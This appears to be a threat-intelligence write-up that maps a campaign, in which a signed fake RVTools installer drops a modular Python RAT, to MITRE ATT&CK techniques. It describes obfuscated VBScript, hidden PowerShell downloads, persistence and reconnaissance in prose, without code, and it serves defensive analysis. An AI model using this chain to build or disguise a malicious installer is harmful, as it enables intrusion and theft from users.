RVTools Masquerade: How a Signed Fake Installer Deploys a Modular Python RAT  

MITRE Techniques

• [T1218.007 ] System Binary Proxy Execution: Msiexec – The attacker abused MSI custom actions to run embedded script content during installation (‘the attacker abuses this mechanism to trigger the VBScript during the install process’).
• [T1027 ] Obfuscated Files or Information – The VBScript and Python components were obfuscated with decimal-to-character encoding and meaningless names to hinder analysis (‘Decimal Obfuscation to hide its true intent’ and ‘core logic buried under meaningless function names’).
• [T1059.001 ] Command and Scripting Interpreter: PowerShell – Hidden PowerShell was used to download and launch the payload (‘spawns a Hidden PowerShell instance’ and ‘calls Invoke-WebRequest’).
• [T1059.005 ] Command and Scripting Interpreter: Visual Basic – A VBScript loader embedded in the MSI executed the first-stage payload (‘malicious script embedded within the installer’s Binary tab’).
• [T1105 ] Ingress Tool Transfer – The malware downloaded a malicious archive from Dropbox (‘Invoke-WebRequest to download a malicious archive nearly 30MB from Dropbox’).
• [T1070.004 ] File Deletion: File Deletion by Windows Installer – The installer used reboot and artifact-cleaning messaging to conceal ongoing activity (‘appears to be meant for “cleaning installation artifacts” but actually serves the purpose of ensuring that persistence is completed’).
• [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence was established through Registry Run entries (‘creating a Registry Run entry’).
• [T1053.005 ] Scheduled Task/Job: Scheduled Task – The malware created a scheduled task for persistence (‘schedule task’ and ‘schtasks to create a daily Scheduled Task’).
• [T1082 ] System Information Discovery – collector.py gathered host details such as hostname, privileges, services, and network connections (‘collecting sensitive host system data such as hostname, user privileges’).
• [T1016 ] System Network Configuration Discovery – The malware fingerprinted the host using MAC address and hostname and collected network context (‘retrieves the machine’s MAC address and hostname’ and ‘active network connections’).
• [T1069.001 ] Permission Groups Discovery: Local Groups – It checked whether the user belonged to BUILTINAdministrators (‘noting if the user belongs to BUILTINAdministrators’).
• [T1087.002 ] Account Discovery: Domain Account – It enumerated computer objects in Active Directory using [adsisearcher] (‘search across the directory for all objects categorized under the “computer” class’).
• [T1036 ] Masquerading – The malicious MSI impersonated RVTools and used a believable EULA and admin request to look legitimate (‘fake RVTools installer’ and ‘false sense of security’).
• [T1573.001 ] Encrypted Channel: Symmetric Cryptography – RC4 was used to encrypt reconnaissance data and commands (‘uses a hardcoded RC4 key to encrypt the staged configA.json data’).